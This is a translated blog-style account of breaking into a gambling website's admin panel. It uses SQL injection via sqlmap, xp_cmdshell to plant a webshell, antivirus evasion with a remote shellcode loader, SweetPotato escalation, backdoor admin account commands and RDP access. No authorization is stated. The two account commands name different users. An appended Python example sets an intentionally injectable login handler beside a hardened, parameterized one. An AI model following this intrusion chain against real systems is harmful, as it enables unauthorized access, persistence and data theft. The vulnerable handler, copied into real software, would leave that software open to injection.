Title: A record of penetrating a gambling ("spinach") website


We found an admin backend built on a QP backend framework that has vulnerabilities.

[image]

This framework has many vulnerabilities, such as user enumeration. If we enter an existing user with a wrong password, it prompts that the username or password is incorrect; if we enter a non-existent user, it prompts that the user does not exist.

In addition, the website has a SQL injection vulnerability. We only need to capture the POST request that submits the account and password.

[image]

Paste it into a txt file and throw it into SQLmap.

[image]

It is MSSQL, so we can enable xp_cmdshell. Here we plan to write a webshell, so first use os-shell to determine the path (super slow).

[image]

Then use xp_cmdshell to write the webshell.

[image]

It was successfully launched.

Then I planned to bring it online in CS for the next step and tried web delivery, but it was stopped by the antivirus.

[image]

It's very annoying. There was no other way; I could only try to get online with AV evasion. The method I used here is separation-based evasion.

[image]

Generate the payload, then write a shellloader and compile it with base64.

I put the shellcode on a VPS.

[image]

Upload the shellloader to the target.

[image]

One, two, three, online!

[image]

Sure enough, the low-privilege user failed at many attempts to escalate privileges, but in the end SweetPotato did it.

[image]

Got my favorite SYSTEM.

Add a user: net user admin$ admin@123 /add

Add it to the administrators group: net localgroup administrators test /add

Then connect directly over 3389.

[image]

I originally planned to scan for remote desktop with fscan, but I found that the intranet IP was different from usual. After scanning, many hosts appeared, so I judged that this was a VPS, and the penetration ends here.

Reprinted from the original link: https://mp.weixin.qq.com/s/ch3zcIlUPpZ8tjCJttwarQ
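The two login defects the post relies on (error messages that reveal whether a username exists, and a login query built by string concatenation) are shown below as an added example, written for this edit and not taken from the post or from the QP framework it describes. The weak handler reproduces both defects; the hardened handler beside it uses a parameterized query, salted PBKDF2 hashes, a constant-time comparison, and a single failure message so that neither the response text nor the response time distinguishes a missing account from a wrong password. sqlite3 stands in for the MSSQL backend in the post (an assumption); the table contents are constructed sample data.

```python
"""Login handler: the weak design exploited in the post beside a hardened one.

Added example. sqlite3 stands in for the MSSQL backend (assumption); the
account data below is constructed for the demonstration.
"""
import hashlib
import hmac
import secrets
import sqlite3

GENERIC_FAIL = "Invalid username or password"
PBKDF2_ROUNDS = 100_000


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256; the salt is stored next to the hash."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


# Dummy salt/hash so that a request for a non-existent user still performs a
# full PBKDF2 computation and cannot be distinguished by timing.
_DUMMY_SALT = secrets.token_bytes(16)
_DUMMY_HASH = hash_password("dummy-password", _DUMMY_SALT)


def build_db() -> sqlite3.Connection:
    """Constructed sample data: the same account stored in the weak and hardened schemas."""
    conn = sqlite3.connect(":memory:")
    # Weak schema: plaintext password column, queried by string concatenation.
    conn.execute("CREATE TABLE users_weak (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users_weak VALUES ('admin', 'S3cret!')")
    # Hardened schema: per-user random salt and PBKDF2 hash.
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = secrets.token_bytes(16)
    conn.execute(
        "INSERT INTO users VALUES (?, ?, ?)",
        ("admin", salt, hash_password("S3cret!", salt)),
    )
    conn.commit()
    return conn


def login_weak(conn: sqlite3.Connection, username: str, password: str) -> tuple[bool, str]:
    """The two defects from the post: enumerable error text and attacker-controlled SQL."""
    exists = conn.execute(
        "SELECT 1 FROM users_weak WHERE username = '" + username + "'"
    ).fetchone()
    if exists is None:
        return False, "user does not exist"  # tells the caller which usernames are valid
    row = conn.execute(
        "SELECT 1 FROM users_weak WHERE username = '" + username
        + "' AND password = '" + password + "'"  # a quote or comment in the input rewrites the query
    ).fetchone()
    if row is None:
        return False, "password incorrect"
    return True, "ok"


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> tuple[bool, str]:
    """Parameterized lookup, salted hash, constant-time compare, one failure message."""
    row = conn.execute(
        "SELECT salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        salt, stored, known = _DUMMY_SALT, _DUMMY_HASH, False  # same work as a real user
    else:
        salt, stored = row
        known = True
    candidate = hash_password(password, salt)  # always computed, regardless of `known`
    if known and hmac.compare_digest(candidate, stored):
        return True, "ok"
    return False, GENERIC_FAIL


if __name__ == "__main__":
    db = build_db()
    for user, pw in [("admin", "S3cret!"), ("nobody", "x"), ("admin", "x"), ("admin' --", "x")]:
        print(f"{user!r:14} weak={login_weak(db, user, pw)}  hardened={login_hardened(db, user, pw)}")
```

The weak handler answers differently for a missing user and a wrong password, which is exactly the behaviour the post uses to enumerate accounts, and the comment sequence in a username cuts the password condition out of the second query. The hardened handler gives the same tuple for every failure, so a tool iterating on response differences has nothing to work with, and the parameterized query keeps user input out of the SQL text entirely.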
